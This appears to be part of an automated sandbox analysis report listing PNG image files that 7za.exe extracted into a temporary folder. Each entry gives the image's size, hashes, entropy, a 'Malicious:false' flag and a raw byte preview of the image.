      Preview:.PNG........IHDR.............v.4A....pHYs.................sRGB.........gAMA......a.....IDATx..R...0...p|..P.v@.....O..u..Z.X.c.....J<B....3.....[Bp@..0......O,..'\d&F.X.0.c..R]..w+....V....9.\.l...N5U.X...aB;.\.{..c.Y..c...M.W{.H.i).E....IT'3<.<a....*.5..!...rm...g....:.R].L2.....J.de^......U...<.+C..x..n.D&..J........}.@..M'.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1238
      Entropy (8bit):7.541938355081379
      Encrypted:false
      SSDEEP:
      MD5:D2FD4915E7A90368DEC9FD9D77E89BDC
      SHA1:794277B95DC6167DB599909A6D8CD18BC26E600D
      SHA-256:75E0479C397BB1ABDC889BB7949C51CAF91A94CED983C6DB26728F414EF8DD4F
      SHA-512:1FC4067270664383E998B7C78E014768DAD6137B24D77EC55201F489BFAFD352F1BD409B029273ECDA8898A44527DFC92EBCEEBFF5E7830FEA3EF325EA6331CB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu...LIDATx..ML.Q.......$*....../z.$.Nh......?....O.x...U/.c<....&`<`..'.!.....X~")ufa.4......K.....|....=v-......b...:..J,..KPI.M.0...........r).........MX^....r..(@.......Y.c..D"e....E..ec%..Ph.....j.|.f...+........yU@...m.Zu......J....x:>..|.k[..*VU..-.(.b..b.^...(.&''c&...' '.=.c..4F.W..z..R.h.J.(..\......^Q...K..1*....s1..@cTzE...b,.....P..X*..Q.......T....+.@=.c..cMC._.f.O..sh..bm.......jsz.....I.`l\5.?Q...m...h.S.y.l.....Q'.u,.W...-P............U....(+l]8.....T.G.....n......!;F..+>....-......06lN......@......#8n.NlN.....r...}.@.&.. ...\*P....... ...\*P....... ...\*P....... ...\*P....... .............p..k.c..q.W..._.+QW....;...G.....k..p.....us.~..=....X...u.5.%...!u....#[..:.O.K.......'<....!6.x.c\.,.s..{/..Q5;..gfaF..`.P..'.va..t...0..gu'W....m0Q./=.>.:.zn.Y.8.u=4....I..&N....../_U..NK.c;....m..k M.I..o..J.....8u.GR.p..JvZ
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1867
      Entropy (8bit):7.79581640400476
      Encrypted:false
      SSDEEP:
      MD5:90A52DC3CA2BEBCEF0F9C3198517CCA2
      SHA1:604C29E5F9186BB4B34AFEDFB4B4397250D8C27B
      SHA-256:80CBA1DFE3F447A57F3030E35EED0BC2209024973F7FE431541008EAB093D9D8
      SHA-512:1121BA2E4771E506A1BF9A5AD2CC3C73FD802673D50B15845A6C5CCCD5B3A93714C8FCF201BB5902F478B1838AF08934BB6DF59C9FC8818DA1FA10E4882A1DB9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx.._L.E...;..p@...X...._hAmi}....J....R..TM#&&j...E...........hhKm_...F.....H..........p...,.....:.....7;..owgf.vm......=..+...\...Qy....+.+r..Xll.e..6o...###.p.6.".r.V..@.....T..?..t.\.c.K.f..eB..Ut..N..4.v{....)/$f...MH....L.....L"..v.yI.c.Sf....9U....:_6y`6s........yx4.....q..pK%@nTlE...[*.r.b+J.l..R....[Q.ds.J.... ...T..F.V.d...;..]...K........p.H..<.B.X..Q..S..(.8~.w8..&X..e... 9IU.;......Q.......z...5..?_..<...../..wS.v.....:..]....l.l..3.`|T...,1...fHm.......M.H..>.[+......B......_;..O]+...5J..(..@...B.X.......4. ..g....C....ukL..kwH.x...>.q....<Z......)...}{....t...H.......55%MM.#...806.y.^....U....~.n..R..^..;..?g.......UK.o.3.+..'...>...Y..".+....C%32a:@oaY.h[.E^.e=.....*.7A.(.OzT:...8ME%'.I.53..@.J.%-....L.U.NE^....*...$DO...%....1>=3"......9.q..P\,....9m.6.i..l........:...2....w.|:.iK.ul..1.../.oFG.n.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1593
      Entropy (8bit):7.74918885047951
      Encrypted:false
      SSDEEP:
      MD5:5FA67E987F561E252D218F40AD247ED9
      SHA1:0B094E42CC07B6AC9ADC9A9F3EE6B3F1594ACDE8
      SHA-256:61E3F7BC562F9323D46B0B0B755987665273E1DB702FF712A6C7FEDD322822D4
      SHA-512:783519483F3B7E0EE7A6470F2955CDDFB3AEED8B00E57C6DB54619B63D22A534E9D848B7E6C523E1E8CB40128C19655A6BDFE250EEFBF4E61BAA346F4CA60D41
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx.._l.E...R.r.,5j5-.?...B F..i|.IA..........L...B|../..=b|"...XcKL.@)H..."U..........-sw..io&...o~37.....mw#..........C.ZJZ..D.\*euI.&.......jjj~p....R....~..o.....9.@. ~X]]...."...N..S.K.6..|....^..bg..F.I./.+......>o....S.n.".....(.y....)*.R.}.^....Q.. .K....T#.!..LNN..h..1.3p..HK.@iTbE.P.EZj.J..+..b..R.P..X...s..............F%V.....u.C.-...K.z..q]....lo...q]!j....S...V......6....K.pn.....5.x....c+.k....C.C.HV..Ju..`.y..i..$....x@.4x#tu...R.d.*...`u>....S...W(...f7gg..[....Fa._........'.......nyA..Dm.@/F..U4._..{...yUX...4..tc<n.R#.l,=.L.,.h.&.kX{.....k.. vT...d_.2f..RW..mj.............1.../:;q......E......hjx..\..*.jz.{A...8....r.9.w..A.Ms...S.)..P.-.@Gax...- XA.J>.~....?`CJ)...wo.]N.HCli.$_.z.s..z...i......*..j.Z.@C.%8G^>"...*.(@..`hf.@.8.....2.+...2.#r..~....}..+..7...2..h........#......%.........4{....x....e..}?......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 104 x 338, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5103
      Entropy (8bit):7.7273654260994
      Encrypted:false
      SSDEEP:
      MD5:9D355F967C8A9312DC7453F97AF3D393
      SHA1:28DEC943E5CBBB56F9676E9F420B0B7742BC861A
      SHA-256:5E45160CA10F9237661F7C76880F1FED2DC5D2E147061DAEEAC7080DF1502774
      SHA-512:D42B873275465473EF4539B83A7F9B6807A9DAE24A35B47AB47840733E00CA7FF4EBE7CFBC297162BD8D78C2B7A63FD4DEA01F05E076D7B6637517ED49060696
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...h...R.............sRGB........8eXIfMM.*.......i...........................h...........R....|V.....eIDATx..o[Kz...~I..W........0.[...4..XS.ss]...r.I.7..]i%#.]....Z!]...-......0.d....H.g....HZ.D..>...sf...{f....namm2Q..;..1f:....)..<..{.n..+>..i......ud6.$s.P..Ow.s..G..t......u.g.L.WQ2r-....s.=............_y....w(h]..G..K.s..]lu#....YI......z2.h..A.....j.b..PX....$.I..6.H..)...-#.d.@*.1...)Ys...~.W&..-...s.....H.G...n..n..........[..@.]t..x....6..gI...;.}.|....vK..?........qT......2...U.A.;_7Fu.v..._......~Rz......ek..._?.p.....b$,..*..k.w.....'.=.'.a.9.e.%.DZ.......3F...x.e:..3....<.......~.F._{.a^q..]..;...?8....u..X.!&...|5*L...1.....yZ..{...O.....;.b.-_. ..^;......G..;..3o.....A....~...\..B.$.(.....&....k..3.k~H`....2%...D.Dc+....?.J.Fb.;........1........|.g..z...$..|.l...&r%.....V6.j.1A.y.>_..y.X.O.......#..E#.n.WQ].......7b.1.X.\..k.'.z;M8r.k....w(..,.r..lc].M..G...9...Gf|.~....W.>3s.|......PG.....$..^............
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 287 x 103, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2172
      Entropy (8bit):7.58562004426531
      Encrypted:false
      SSDEEP:
      MD5:16F74303AF5DF6462BC414EF8D92E19A
      SHA1:6BA522C4548D8CA86BDA22B9F028A048D9500A88
      SHA-256:B2085D9AB4122F703DF8BD277AC9A38D663833C69E6ECCA4FBD7E8DC7F12CE24
      SHA-512:5A690CF5DC1658A45012C83B3B61B5D44C2C273C110E6F57BA40729542CB4E6712DE22B53E3F5C34CBA0896991AD7D5F206000C1F0E30E7F3009858B859C7714
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......g.....9QFU....sRGB........8eXIfMM.*.......i.......................................g....u..#....IDATx....R.^...4il.:.q..]....O.V.+v..8n....w.r-...q..W..f.aF..I..=.......@I.O..47......=."O...~%... ....#.E....&....5{...9..lmy.....gN...@....~.n...O.......y.ff;..{.......@..3...B-....3......@ %...&.?./.L...j1.II.b.@.L@..oK..c......../.....H[...+..z.....d)....|.$.....i6M..<..a0 .@..&...g..l[@m. PJ.8...S...~J.@..@ {.^...z...==5"Pn. .]...Z.rK.{...L@...z_o2....m...k?..S..%..8.........Grr..N..@..4.B.xc....?G.h.....(.IPJ..........#..%...i./^......7..........\Y@...qlVQD..6..\...... .... .... .... .... .... .... .... .... .... .... ....._.].j/.q..Y.Ls...@67Cq..[s.}>......."p...;.J.........=.4s).......#0.9..V..3G..5l&c.n:...>)....d ..'.D&..r.g0............s.......".......]y..H....O....!.WL.......9..U..<..'&W{..(.+..h.9f.V.....~.....^F U...D....\.0.G...j..i...~...e.R....>.jOu.Q8.I.]j..U/..r..7....\....8:..t......x.I.^...l.K./...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 101 x 131, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):14550
      Entropy (8bit):7.974405211072146
      Encrypted:false
      SSDEEP:
      MD5:5C92C6C7A508B1C809977D8645CCFD35
      SHA1:51741D1493A3E32C5E404D963D04CC4BEAB31179
      SHA-256:3B1B5B6ABB8AE031AA576B4DD7324B864F30B797582DEB337952038EE2E3DF7C
      SHA-512:1765E7A2306B76CCEE29BA5FF2D5CEAD6DAEC55BEB88C531DBE5B7BFEDFA81B58F7B89FC274C7DE150ACB973D2C7232FD6AAA6A4933FA10DD062837D2F5F3E9E
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...e..........a.P....sRGB........8eXIfMM.*.......i...........................e.................!,...8LIDATx.....Uy....g..$'3..cB...!.......U...r{.j...^..{.V..V.mA[}..E.jQ@..@.X.d.P...$g........v...N .....d.5..]........qn..K`^.........%0/.y..K`^.........%0/.y..K`^...8....[r...'?/.y..K.hJ v4..i....WSW...%...r,.o....D)S...}.c.Zu.R...p.`b..5...~..M..G...I.....?...-.......t.x.|\.QY.JV...A{<.db.z..]2...1...Wu.x.n.Wk.g...z-.d..yhh"....{.G>?q4..Rh..@.b...u.k.......=5yA2S_.JW.'[..Kko...b9.!...c~.*.....x%k....%..7.h9..ZN..D1{.D.c....M..W[U|e8?.....6mN~9...{[..M...NI..3.U,."....0.gq.!..h8.0..@<0.......4)....'...J.........~.i.b....y.@..g..v......w..J...k].ER.H......Y-R.b./.&..I..2..f.j.B*.(.)....U...nU.,Z..h.U....Hbl...w....'W|...~4.2ab#......}k.E....+=..|..N..\.@.PB. |.-.O.).P.r.+......C^H.@N..........=..I.O.....W."..C@V._I}.PA.Xs...+....l....V}..........)......73.........k.P.........Vd...U..&...v...8N 5.g_B>....Ii...)......|="....T.PQ.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 101 x 131, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):14899
      Entropy (8bit):7.975177429698776
      Encrypted:false
      SSDEEP:
      MD5:30D88B8E5713B4B72BADE49175FBA803
      SHA1:FC69A73AE19564053B79A8D56F64321F1EF9DE44
      SHA-256:F5D06C377276922FFEB9932FDAD0A4B626565A0D95BB6D8BC8D17A547D0A978D
      SHA-512:EDFB18E589CF6E233547C9B3D19C06B927B7692A363B8C5BC93DF599A4A3F9B01F0A79D0A50CF7DFFC11829E87716A34363682CFA2D730A04B208A05324C2B46
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...e..........a.P....sRGB........8eXIfMM.*.......i...........................e.................!,...9.IDATx....eUu......C..5.B..@. T...h.#$...C...%NQ.....5.L..f@[.....q@.@..I((@.....7.w...:g....x@!|....~{.{...k.}...s.n.......<..90.y..s`.......<..90.y..s`...........%/.....s`....x!9.x!;?.}_q.g3...V....j"......T%.l...j&\..r#7...h.glo...........,(W.....,..%.......d............3..r.T3.....u.....]#Ym.w..FrW....l...6r?...>t....~.O>5.B2......%H\..t..`....L.t..6../N....7I..4$..r.P>.@.....'. ..k$... ZM.W3?.,..<Y...Uw\>x.!.R....^4j6...t.......J>3..B..!..."$e".......?..............8u2..H%Dj"Q...?\..o:P...WKo.....r...y.@..'..q....Co.,T..v6z\.\....d...e-201%.C..T.0(..6....D" l...........|.....\e45^*..2R..?..V.....;."ab3.........M....';~E{[..L7.....S..rb>L..g......'\._. .......] @....~.....O..>B..BU`.d..*.!.....$..T.R.?.SYu../.8....6...?...k.s...(..Ow5.....Y..BJ..J*r...V....S..x......8@..'.&.............3........I....L_.L..h.M..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 101 x 131, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):13668
      Entropy (8bit):7.972712648424531
      Encrypted:false
      SSDEEP:
      MD5:2154B8DF053094006BD7EAF8FA2747AB
      SHA1:99529A713D1F40754C434F7170877448F0733500
      SHA-256:70A908D7FBDD363CDBAFB90D2C2CA37F337BB0062CBB9E1535546EC670A004EB
      SHA-512:2C35D01A33C7755940AF69E2AAE885C07597F36A670CFD3E7E1D5E55D911E19FD86B8B0AEC21A21B4D4B728093D08C95ABD729CFD0C586D34FE308A7137F0F35
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...e..........a.P....sRGB........8eXIfMM.*.......i...........................e.................!,...4.IDATx....\Gu..~...Z-K.e..,..cc..l.g.$8v.d',3L&a......df .$..@.L.f&...6.f.lb..`.x.%,.dY...v.....;...E.-a..u}...SU.N...Su.'........j........j........j........j.......8....[v....j.....N..2........}.p.._.^V=.?.)V{.zo9.(u..X..k.\.Qo.&.t49.....\......-......7.......p..b.}A6?}v%.\U..grQ.6..2.N.e]>...r.k.vv.c.M...G....N;.m.].....?*\........R.O..3..(.../.?......c...SW.K.5.b.|o.uE.M..}^".4.Rb&LA..#\\..b[iK..BK.&....iM.~2Y/.k.5......ad.A.U.gF.3z..0.)...........5.r.B_..z%R..@J....?...y.G........4.......iJ&5......hL.o.7............'.......?...}.~f.t.W.+.+...!.#-...........)1G.B...P].Nes_m.!.........j+6..8-^.xM.m-r....T...C......./^3...O.&6.........mXx....._W..0(.T...H......b....P.Rq..Y$....d.../......~..Gq...S.<.T.i..4`...kh...)..u(..k...O...=.U...i.G3...##.....g....^_....N..H)e.xK%JQJ.*JU.*g..../...u.b7#p.@J.R._J>bh..)Y...h.........}.A .JS
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 158 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1593
      Entropy (8bit):7.769529807081452
      Encrypted:false
      SSDEEP:
      MD5:AC2126633BF581BC0845856F456C2E0A
      SHA1:7C1FBF98D59D5805F768611AB51E28628EE13D57
      SHA-256:1BFC0A474897BE2CA45C5C4883154CD7FB71ED6B736E49552C91FC778D56E576
      SHA-512:5E9BACC7171F0BE86B85031C02C70ABD47E8B1CD4879EA07383C8E3772248C81BA66F97608CEB3687E1235AE3B479AED3F7BA2BD845961515F7B853FA58567B9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............lD.....sRGB........8eXIfMM.*.......i.............................................E+w....IDATh..[]r.6.^Pr..K...9A..T>....z.{...QN ..q..Ve....b. ......ID.....@..4..C.x.,....O.p...J.@N..G.@.......@..lBJ..e"I...^\P.5a...OU*...X..'...]@:..^....x.!u.#Yk.l..4*....9.....#..;.'S...~..u=.a.O...z..}..t.U>..,.+s4.g....cS.V.^2qu.+#...?...;/:Mj.^..!.n.T>.q,.+s4kD:.T".x..KlL:6./d.....;te`..fk.wc.H..._....F<.K..X.|(H..e`e.bg8..$~4.7..."..$.'..=..x.^|.k...Q.k.x.$C.AK-.z_..{.....+....9..vK......G.fH.O.O...5..:_...d7I=.....B..0.;..b...%.L.qM...1X...........^J.9...V....!..rd..(V.>RpN.w.N..CD.u#..../.+....JUWWD.L:..........R..^W.....)L.&.s..D.h.4.U>"DL.:..bL.......xU....M...D..+.sD$D..u4.U.NJ.X...ut..n.H.~3.VXAZ|....z\..{.b....&....O...O@..y....v...4..\J.;0....^......7s.a#.e.....}.Z\.3...a........d..~j.h.&. ]....... .........F.hU.q...!_..jf.. .R......>..R.).`.9m.....t.7.Q.{.K.].S.PHd_.b.f.o..z...(....!...<.6A<.<.......S..~....2....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 158 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1784
      Entropy (8bit):7.780864195254214
      Encrypted:false
      SSDEEP:
      MD5:A919DA8BECFC5A04C0BDA263A0A659BE
      SHA1:E2461E6CA91D657CACE72312EA636770496ABAF8
      SHA-256:3EB3BEA8F4E219E68A0483CCC62DD5F8E6B3E825023D4580DF13837F36F6D966
      SHA-512:5BEBD756F718AB2A208D9120FE4846BA93735717070BD2D557CD25B40CDD661D758CE443F2A043AE9A5194A171C37C9E4241ABFA7560412841F0738A5B66196C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............lD.....sRGB........8eXIfMM.*.......i.............................................E+w...nIDATh..[]V.F..3.9.K...<.$....\..S.........B..m\...Y.&9<...}!p..~Wh.H....i.Ds..;W.G.....Ae)#.....a(.b.j.$(.D!.P...F.D........m.:e)#....p-!.......|...@'..;.G.T.A/...&Q.p...........'...,w.....<.=..r......f.F_wh_.j!.......+}.G...>h.j'.......f..{..Q.k....T....sVN.F.A.E..F.SJ..q<99......PJ.p=...XX..f.L.7..|S3.M.!6.....^.....{.{.t..4..-.IV.....tyg.R.u5..g.DZgaY...CZ\....Yo.s..$....T..Y......P.0...k......}k..... ....1..3....*J@.....kj2.W.eL..4g..p)..b....zD.7....".,.Q.. s...O.-..0".".S....... 1 EC!i.....o...`?A^....c.X..b....>...8F!...p.Xq....k..A.E...m.E...Gm.!....".y..n_.W;GJ.F6|......>`.L..Z....W.....,%.R...yHc.&...J.qD...........u....&...._...5..5....H.V..Ck...;..~89)....,.(.v1..X..........X\..\....&..Z...a...t..(..W.Wo..{..6@...B.....1..oz.a#.eQ..{.>.-..K.Q.V....m..5V.....,.N.C>.W'...}..^......K@.l.S.0.R..G....._..:.2<.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 25 x 44, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):590
      Entropy (8bit):7.040119212561643
      Encrypted:false
      SSDEEP:
      MD5:7F186DD34FDE8214AA45FEE64D302ACA
      SHA1:E9724034E6C133DB220696E7BB2BD1F37F19EBE4
      SHA-256:B9326C5BB1F46F5003236BCE67D84BD9E4AF7B1AF2E9063F3504BE90BCB32E68
      SHA-512:A59672B8EF5D5BB6338EFF3B1BA9CEA2AFA4AC81F0DB0EBAE378DCC1BEDF5C27F1B74139EDBA197CF85E071DF6A70314F083BF108B2E8EEB2A6BB106118C6ED8
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......,......^.}....sRGB........8eXIfMM.*.......i.......................................,............IDATX....N.0.ES.b..!6.D.._..,X.B!H.S.Rp<.=v.t...s4.a.,.....Sy#..+.......|(_....D.&.X.......1v>h....q...F$.96j..........7....-.B.Ue. ;..!. ....C.H.:.U.ptE...9...p.. C.S...*..,h.B.a.\... .aC3X &wrD.Br@.$.....B..9.I..(#..P......y[#/d..}..5.k .D.2...ZH.q,.b...Q+b\M..k!._.........S.j..<.s.r.'......C..R..@..............K9....E.)...q..2...&..V&....) .i..2....rU...$...H...{V.qaJ..)..|+[...."o....DM...M....k\.f... .d.*.-.;Z..i.HGZ....6.,..^d..T.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 1015 x 372, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):110727
      Entropy (8bit):7.986391704704301
      Encrypted:false
      SSDEEP:
      MD5:7A9E089FC689BA42B9278865ACFA5322
      SHA1:E0B5FFFB724E8EC3FA86F2D8384222638C233A40
      SHA-256:94AFBE500349AB67AEC297F2C1112294144C407A44C4252B09464EEB884E1803
      SHA-512:AF36C5C53D67B0A3A5F211F167AB128D869CB3AF313E25B5069FC36A6DBB8BE8D940D385F6E3F965C5EA5EF71156C971465F3F98DC9D2C7D5E49599BEDEBD196
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......t.....f=.....sRGB........8eXIfMM.*.......i.......................................t......l/..@.IDATx....^Uu..&.K.y..-@....E..U..<h...f....y...[.......Z..5...Vm..ZZm3TmK_.f.B.[$. ...f".P.L....}...d....y.3k.g..g_.......^{.O......!`.....!`....A.W..%<...C..0...C..0...C..0...C..H....s.....mE..........w...iI..].ya#C..0...C..0...C..0...C..h4.]]].K....z...q....{.......0...C@..4...C..0...C..0...4......#G.\..B......$\.B..U..... ..8...w....~..nI.[x...<..!`.....!`.....!`.....!.*.....oH....b.XK...^:.a..m.M.....|........!`.....!`.....!`.....C +.7x{..i......~...........B..9"ld.....!`.....!`.....!`...)"........K'P..o.E/K..|. Gd.O.....F..!`.....!`.....!`....@...D..a_.w..].v.T..E.V.Pn..F..!`.....!`.....!`.....!.0..".....z..G.V.^.}.....g.!+ld.....!`.....!`.....!`.... .Ad..z9......W.b.G.W....?...D....!`.....!`.....!`..b..._..;....r_..^i..7O.._..7/ld.....!`.....!`.....!`....".7.%.S.9..R.&..|q..F..!`.....!`.....!`.....!P..yI.k...$.|.............
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 87 x 91, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):6832
      Entropy (8bit):7.958809713464221
      Encrypted:false
      SSDEEP:
      MD5:754C5F60CB7FE8552683E79232BF8465
      SHA1:E2844D5F8CCEA02FBC0EDF04CB913A3B94D3258D
      SHA-256:DB2E3EC33CBB3ED4A3046793263BEF50515DF5BEC84C1CE8231976B99DD6C791
      SHA-512:064342516375B2F92C36443AFB64840FFF749AEBE1251EE691C9FDF5B102C589C769F8E9BC68B416332D35BECE51BECDA213F1C15884CE5D5542419E803B0A72
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...W...[.............pHYs.................sRGB.........gAMA......a....EIDATx..y.].u.O..f.6.F.( D....'..$.#.Bb.......SeHL.*.Hr*q.0.v.%.(..M....\.61R.."`.... ..B....,..9...;o...0)..n.e....s.t..#.@..z..c|.y..J..|k....J.$..Dd{.5.o.!......>..W./Z..u.a..[uy*.:...Y...%.Xj..~.M..2.Df..n.....X..6..7IyhV+^..... ........#@,h....L.?..r....d...%.+>^..'J......9...R..uY...6..Z.z.M..i.../y....W^y.]o........?..;<$#.$Qy(..F.\w?%.@Dz.../......I..=O.v...D.|..Lj:}..Y_....]..]u..t.....j..qO>.......ue{...J..-rM.*ya...[..^..v....]!..U`GF...h........\.H.....[....tu.*....m...)W.Gh.7.3.D...C....+.<...<....t[..f..7.b.XF.^K..;v..+W...R...n....g...T y.&.....euf..sL}....l.......\5Y....SMmv..6.e.BH9...a.u.".<yr.d...&w......i..8b.k..$...Y.oU7....Bpn..L.R.=.\...9..x...y.=(.H..P3.9".b.Wj-j..S.I.;...6....a.R.`.....R5<......J~MG....s..2LMF..5.{Nd...|.........j.r"$i....U...j..f..r?.r...-.=o.....]..;..I"..Zy.0.r.;,......'.qO..E..h..{....v.#.LUfH..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 83 x 87, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):6013
      Entropy (8bit):7.951237506183448
      Encrypted:false
      SSDEEP:
      MD5:7BC517CA927E47664EFB9A752E22285A
      SHA1:260EE238DDD53B29EC059D8B0CD91DC10FEDFC5D
      SHA-256:8BCC1E85DC13186B0D9EC5C20520691E8A440C58CB3C26F7161B316416D5FBB9
      SHA-512:BF318FF49C8E8AC695BF0CD5D8165C7D24D7086E4E43CB51FC86A81D0AEC57AEF8B02CD0528C75EECE4ECAF37691A37AAA7F3B6C3F615E0CDDAEF85524CA7BC2
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...S...W.....x#y.....pHYs.................sRGB.........gAMA......a.....IDATx..].p\.y.......6../...... .J......#.1ub.mf.h:..t.....R.i.C.4...l....L...d.....?@.1..e..]..'...9.W+.%.J.l.....~..s..."R..3...x5......N..(......bk...t=6...I.r...hw..;......G...B...'..M~..6....I.f|.....v..A.V..M..]C.th.H..-....p !u8G.-..9).. ..z.C.D_M....m...Zk....Q.~.z..s...s~?H.~...c... .F...m.N...,fU.2.o.A6.Y.Dm.....z..;........w....6...ce..u.=......*_..'........;......,h.0pX?~..........hD...W..]WuF.^..6..9s..o.I7.t..8q..3........K~..U...4n`.Yh....~0..Q....O;V.4}..t..j9.....(.....G\G.v#...\.._.nll.w......7.?L......o..9.`..Hl...*.j.*.....4........Z.tH.wT.._..f..e..I}...(O7...q.X...2V..^..=..J.b1...;_...@f"...#..+HM)..bD.g....odj...M}..k....Dc..T.....j...'...|..=......RQ.@.}.q-..._h...z.........555..y..........?.......7...4..:.....Qi-._..`0.........:::.x......|....OX.o..)%........7.....vh....b.............G.......n.O{...MPQ...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 314 x 232, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):13527
      Entropy (8bit):7.973745250608926
      Encrypted:false
      SSDEEP:
      MD5:AFFDC914E4C97DB240AAD7D6B368427E
      SHA1:EDB3E6D808E1FE7B55536D056034E8C480A851E4
      SHA-256:4A82D28A4FA1EB6F2C6FF5D9C60D2CE0F60EF6750E2C43B5CD037C1E520EA135
      SHA-512:96B30F468EF66BE83BDFEB0B536439073382C31EA3FE25955120F39C46AB0DA02056EA514E19F00C4D83FA3909F0AADD4B21122FA8352134F7C8994D22F1DA84
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...:...........(.....pHYs.................sRGB.........gAMA......a...4lIDATx...|T...3.......e..*.....C.R.U....jIz....v...O.......P..Z.j.o..V.E..(.B@A.............;9o83..9g...<.OOg2s. .7..>......d.#...L........a....M......:..'.`?.|j..&D..0y...M.RZH.......a.&OH......1/.DT7.WQ]..T.uyB......0L..Ft..?:KOYc...%..TS..x=.......aL.7.+..!.QQ1.U?.&...yw..(.../.'U.N.U..m....0...^...... .]...3...TNa..IFq.....;...&... .(T......4x..n...0.......j.B..J..P.X.;\... ........o.[..a..$.......S.ZA.ZK....!.;..(...{K...+........0L.....E.~LD...I.2#J......g:.d.&.1.3b.:!..=.H...=5P.({`.z.|x....!.a.$......QM....s%9 ....!.#.a..........Y.vv.t...F.!..<.@..l_pK.1L.......>R......C.%_...<8j..[............/._.....x..*_... ._........+.6.y.z.&D...$...&......%&?..x|.....M..;..OwN.@.......x....H.Pa.1.i2..W......|.G.=.B.^...o..y.....3ib._".J<....T...>..5?uGh.......~...6.D.6......,......*...D"....f....)h.R...WP.Fif...[t..7.w.q..i..E.........=.E.jO..j...TI.B..x....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 34 x 26, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):893
      Entropy (8bit):7.674368998775134
      Encrypted:false
      SSDEEP:
      MD5:8DA9247BEAE3E5D54FA8FD5C506FF2A2
      SHA1:A931A5638A26B9563D9DDC38BE4AEAF0906C7089
      SHA-256:1198A1C0C99FAEA2C51C5CC5419C9078D236B5288AE6AFEB00AF1E792364CFFA
      SHA-512:99A6888EE328BEA3F5FE1804373734E0CE1701C0D2CA7E402545AC877010CC440A6814969021F9DE61A94D927AAD745388C199CC9BF976F0BD5B6EC7C1EC6EB2
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..."..........n......pHYs.................sRGB.........gAMA......a.....IDATx..W.N.Q../.P X#@.@...( ?@6.......]...._...65B@..b...X*.d.%[.-?rf..6.......9w...}8BC`..>11.@u..s_..yi.....5H.....4m...]......u||l........3....R....47...N.Ny....D.Z...D......7......I..;....au@.t..?.Hd{{..'QH l...F.......d.r.s...I..y........G....gj.Z.ua+qyy...gww.@B...v...%W.......ERA.^.s....NTHD.Q......{{S....u...$..b17$.P*.H._....VE.P......V...}jjjCCH.RD.7.8'H.8.....:7<.l.04...].066F#..5yR.0.......v...Gx...r..8..**.J.....[..l. ..K&..K.1.x.I.......2B"...K.,...*.L.+L`aa.T..O.....M......|..a.A.Q.X...Y..^YYQ..........{....R!........t@F.<:....o...."LqT-...).'v...q..ma.pX .... .;.......&..}.]0e..F~.9.zu........k/..K......*.N.....N...F.<.|...6..!..vd...z....k.a.H. 6b.{~.&k...9.|.c)1h..u!s#....]t3ROH...z.u..HiKY..........bH......=1...{..._$..W......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 86 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1473
